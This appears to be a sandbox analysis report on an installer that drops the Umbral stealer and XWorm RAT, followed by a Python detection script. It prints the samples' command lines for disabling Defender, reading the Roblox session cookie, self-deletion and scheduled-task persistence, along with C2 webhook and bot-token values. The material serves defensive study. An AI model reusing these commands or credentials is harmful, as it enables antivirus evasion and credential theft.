Analysis

  • max time kernel
    146s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240221-en locale:en-us os:windows7-x64 system
  • submitted
    27-04-2024 12:09

General

  • Target

    Malinovka Install.exe

  • Size

    319KB

  • MD5

    f69924b642ac4b9ef1dfacdfd43759a9

  • SHA1

    95da50564c7cbc3749148419c68a08b0f2869ee1

  • SHA256

    d9b248ce98a243a37d33096fc7b1cad784ee77f5920b0bd6618a6690ca426f18

  • SHA512

    2334511265c507d16b3a323c721a392659feb405a5d9fea588146c4ef320261166312c2fcf8f494c4aa342e0b5a9d5da20576ce2d6ae1e3215ee47dcc19f5e07

  • SSDEEP

    6144:48loZMCrIkd8g+EtXHkv/iD4DDUgoOJBiLHaIJtM34b8e1mmiW2brXv5P:7oZRL+EP8DDUgoOJBiLHaIJtMQIL/5P

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1233119648527159317/Az86qBZQwyED_alc1sGO6UWR18PzIJCJX0PM3XdL1VTOwZPXr0B4Rc6-GqAkKUjg4Jn2

Extracted

Family

xworm

C2

phentermine-partial.gl.at.ply.gg:36969

Attributes
  • Install_directory

    %AppData%

  • install_file

    Client.exe

  • telegram

    https://api.telegram.org/bot7080511499:AAGFFOA3S2vvwmEy85SIMhKHrMsAdBoLR2Y

Signatures

  • Detect Umbral payload 3 IoCs
  • Detect Xworm Payload 5 IoCs
  • Umbral

    Umbral stealer is an open-source modular stealer written in C#.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Drops file in Drivers directory 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials, cookies and session tokens.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine the installed video card.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Malinovka Install.exe
    "C:\Users\Admin\AppData\Local\Temp\Malinovka Install.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2920
    • C:\Users\Admin\AppData\Local\Temp\Umbral3.exe
      "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2300
      • C:\Windows\system32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"
        3⤵
        • Views/modifies file attributes
        PID:2756
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral3.exe'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2080
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2972
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1768
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2768
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2688
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2412
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        PID:1068
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1800
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic" path win32_VideoController get name
        3⤵
        • Detects videocard installed
        PID:2876
      • C:\Windows\system32\cmd.exe
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe" && pause
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1116
        • C:\Windows\system32\PING.EXE
          ping localhost
          4⤵
          • Runs ping.exe
          PID:560
    • C:\Users\Admin\AppData\Local\Temp\XClient.exe
      "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2760
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:336
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:2336
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Client.exe'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:2276
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Client.exe'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1880
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Client" /tr "C:\Users\Admin\AppData\Roaming\Client.exe"
        3⤵
        • Creates scheduled task(s)
        PID:2860
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {16A5A0CF-D02F-4D23-9C5A-2C8E1182CB1A} S-1-5-21-2297530677-1229052932-2803917579-1000:HKULBIBU\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1976
    • C:\Users\Admin\AppData\Roaming\Client.exe
      C:\Users\Admin\AppData\Roaming\Client.exe
      2⤵
      • Executes dropped EXE
      PID:1520
    • C:\Users\Admin\AppData\Roaming\Client.exe
      C:\Users\Admin\AppData\Roaming\Client.exe
      2⤵
      • Executes dropped EXE
      PID:2632
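The behaviours listed under Signatures and laid out in the process tree above (Defender exclusions and feature disabling via Add-MpPreference/Set-MpPreference, attrib +h +s on the dropped binary, wmic hardware fingerprinting, the .ROBLOSECURITY registry read, the ping-then-del self-removal, and a schtasks task firing every minute from %AppData%) are individually weak signals that become a strong one when grouped by the parent process. The following is an added example of that grouping written for this page; it is not part of the sandbox output or of either malware family. The sample events are constructed from the command lines recorded in the tree, the three benign controls at the end are invented, and the field names, the user-writable path list and the "every 5 minutes or less" threshold are this example's own assumptions about the telemetry (Sysmon Event ID 1 or an EDR process-creation record carries the same three fields).

```python
"""Heuristics over process-creation telemetry for the tradecraft in this report.

Added example, not part of the sandbox output. Assumed telemetry fields:
image path, command line and parent image path (as in Sysmon Event ID 1).
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    image: str     # full path of the created process
    cmdline: str   # its command line
    parent: str    # full path of the parent process


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WMIC = r"C:\Windows\System32\Wbem\wmic.exe"
CMD = r"C:\Windows\system32\cmd.exe"
SCHTASKS = r"C:\Windows\System32\schtasks.exe"
UMBRAL = r"C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"
XCLIENT = r"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

# Constructed sample telemetry: the first nine command lines are the ones recorded
# in the process tree of this report; the last three are invented benign controls.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\system32\attrib.exe",
              r'"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"', UMBRAL),
    ProcEvent(PS, r'"powershell.exe" Add-MpPreference -ExclusionPath '
              r"'C:\Users\Admin\AppData\Local\Temp\Umbral3.exe'", UMBRAL),
    ProcEvent(PS, r'"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true '
              r"-DisableIOAVProtection $true -DisableRealtimeMonitoring $true "
              r"-DisableScriptScanning $true -MAPSReporting Disabled -SubmitSamplesConsent NeverSend",
              UMBRAL),
    ProcEvent(PS, r'"powershell.exe" Get-ItemPropertyValue -Path '
              r"HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY", UMBRAL),
    ProcEvent(WMIC, r'"wmic.exe" csproduct get uuid', UMBRAL),
    ProcEvent(WMIC, r'"wmic" path win32_VideoController get name', UMBRAL),
    ProcEvent(CMD, r'"cmd.exe" /c ping localhost && del /F /A h '
              r'"C:\Users\Admin\AppData\Local\Temp\Umbral3.exe" && pause', UMBRAL),
    ProcEvent(PS, r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass '
              r"Add-MpPreference -ExclusionProcess 'XClient.exe'", XCLIENT),
    ProcEvent(SCHTASKS, r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 '
              r'/tn "Client" /tr "C:\Users\Admin\AppData\Roaming\Client.exe"', XCLIENT),
    # Benign controls (constructed): the same LOLBins driven from an admin's shell.
    ProcEvent(r"C:\Windows\system32\PING.EXE", "ping localhost", CMD),
    ProcEvent(SCHTASKS, r'schtasks /create /tn "NightlyBackup" /sc daily /st 02:00 '
              r'/tr "C:\Program Files\Backup\backup.exe"', r"C:\Windows\explorer.exe"),
    ProcEvent(WMIC, '"wmic.exe" os get Caption', CMD),
]

# Directories a standard user can write to (assumed list); droppers usually live here.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public)\\", re.I)


def user_writable(path: str) -> bool:
    return bool(USER_WRITABLE.search(path))


def defender_tamper(e: ProcEvent) -> bool:
    """Exclusion added, or a protection feature switched off, via Defender cmdlets."""
    c = e.cmdline
    return bool(re.search(r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)", c, re.I)
                or re.search(r"Set-MpPreference.*-Disable\w+\s+\$true", c, re.I))


def hidden_dropper(e: ProcEvent) -> bool:
    """attrib +h applied to a file in a user-writable directory."""
    return (e.image.lower().endswith("attrib.exe")
            and "+h" in e.cmdline.lower()
            and user_writable(e.cmdline))


def self_delete(e: ProcEvent) -> bool:
    """ping/timeout used as a delay and chained with del: the classic self-removal."""
    return bool(re.search(r"\b(ping|timeout)\b.*&&\s*del\b", e.cmdline, re.I))


def roblox_cookie_theft(e: ProcEvent) -> bool:
    """Direct read of the .ROBLOSECURITY session cookie from the registry."""
    return ".roblosecurity" in e.cmdline.lower()


def hw_fingerprint(e: ProcEvent) -> bool:
    """wmic machine fingerprinting launched by a process in a user-writable path."""
    return (e.image.lower().endswith("wmic.exe")
            and bool(re.search(r"csproduct\s+get\s+uuid|win32_VideoController", e.cmdline, re.I))
            and user_writable(e.parent))


def minute_task_persistence(e: ProcEvent) -> bool:
    """schtasks task firing every few minutes whose action lives in user space."""
    c = e.cmdline
    if not (e.image.lower().endswith("schtasks.exe") and re.search(r"/create\b", c, re.I)):
        return False
    if not re.search(r"/sc\s+minute\b", c, re.I):
        return False
    mo = re.search(r"/mo\s+(\d+)", c, re.I)
    every = int(mo.group(1)) if mo else 1          # schtasks defaults /mo to 1
    tr = re.search(r'/tr\s+("[^"]*"|\S+)', c, re.I)
    target = tr.group(1).strip('"') if tr else ""
    return every <= 5 and user_writable(target)


RULES = {f.__name__: f for f in (defender_tamper, hidden_dropper, self_delete,
                                 roblox_cookie_theft, hw_fingerprint, minute_task_persistence)}


def triage_by_parent(events):
    """Map each parent image to the set of rules its children tripped, so the
    individually weak signals from one dropper add up."""
    hits = defaultdict(set)
    for e in events:
        for name, rule in RULES.items():
            if rule(e):
                hits[e.parent].add(name)
    return dict(hits)


def suspects(events, min_rules=2):
    """Parents whose children tripped at least min_rules distinct rules."""
    return sorted(p for p, r in triage_by_parent(events).items() if len(r) >= min_rules)


if __name__ == "__main__":
    for parent, rules in triage_by_parent(SAMPLE_EVENTS).items():
        print(parent, "->", ", ".join(sorted(rules)))
    print("suspects:", suspects(SAMPLE_EVENTS))
```

Run stand-alone it prints five rule hits for Umbral3.exe, two for XClient.exe and nothing for the controls. The grouping by parent is the design point: an admin adding one Defender exclusion from a console is not alarming, but a binary in %Temp% that excludes itself, hides itself, fingerprints the host and then schedules its sibling to run every minute is. Note that the rules key off the dropper's command lines, so the later taskeng.exe-launched Client.exe instances are caught only through the schtasks rule; for those, the task name "Client" and the action path under %AppData% are the artifacts to hunt for on other hosts.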

Network

MITRE ATT&CK Enterprise v15


Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      2ac40f71bb116c3f32983f5d224e1c94

      SHA1

      bf262915d35729dfbfbb6f00b70f69311cd87f49

      SHA256

      1f1c554eb0c90a727e88ddaa5e4e88213ff4443503a30165bf1ffd022565c3e7

      SHA512

      df6e9fcc8cbd480744540db4d9d63234b325b1357f2b3c8ebc1d1cdbe5d259433808bd28b94b3f1b15447e5ad967eff322b92be4780dadc8a74a0de14a034e3f

    • \Users\Admin\AppData\Local\Temp\Umbral3.exe

      Filesize

      229KB

      MD5

      7a902c87a60986f18a6b097712299256

      SHA1

      2c01906a39faa9d27a41e0d3cd84e92410b9c483

      SHA256

      e4e4f9045dc3683a2a69b9c7625f2ff46ed241ff64b47660a039dbc9d34cb0d5

      SHA512

      c8b75b3f0a77d1f84167af3c431e186802ccd5271fc4a361142e0209541de37f5d584d487bf5ea4b4d921e6e3846267fdea9f65cbd71001331bfea08de5425b6

    • \Users\Admin\AppData\Local\Temp\XClient.exe

      Filesize

      80KB

      MD5

      3fc932775533f1bcea180de679a902dd

      SHA1

      3f393d02af4653e34bf5526ec5b6f8d6e4df65e8

      SHA256

      09a15daeebc228706f36a7659284ef673ea72e7a71700a2f73f4f1409486dd6a

      SHA512

      f59d35a6fe5517a5b9a1ec9a07899eef9f48745710196f1824cc79823994d6fba7975da457ee06ec6215f56860680dc0c07412268c2b1c725c4c66611a75a764

    • memory/1520-84-0x0000000000D20000-0x0000000000D3A000-memory.dmp

      Filesize

      104KB

    • memory/2080-20-0x0000000002790000-0x0000000002798000-memory.dmp

      Filesize

      32KB

    • memory/2080-19-0x000000001B640000-0x000000001B922000-memory.dmp

      Filesize

      2.9MB

    • memory/2300-14-0x0000000000B10000-0x0000000000B50000-memory.dmp

      Filesize

      256KB

    • memory/2632-87-0x0000000000F90000-0x0000000000FAA000-memory.dmp

      Filesize

      104KB

    • memory/2760-13-0x0000000000210000-0x000000000022A000-memory.dmp

      Filesize

      104KB

    • memory/2760-88-0x0000000002240000-0x000000000224C000-memory.dmp

      Filesize

      48KB

    • memory/2760-89-0x000000001B4A0000-0x000000001B550000-memory.dmp

      Filesize

      704KB

    • memory/2920-11-0x0000000000400000-0x0000000000457000-memory.dmp

      Filesize

      348KB

    • memory/2972-26-0x000000001B690000-0x000000001B972000-memory.dmp

      Filesize

      2.9MB

    • memory/2972-27-0x0000000002620000-0x0000000002628000-memory.dmp

      Filesize

      32KB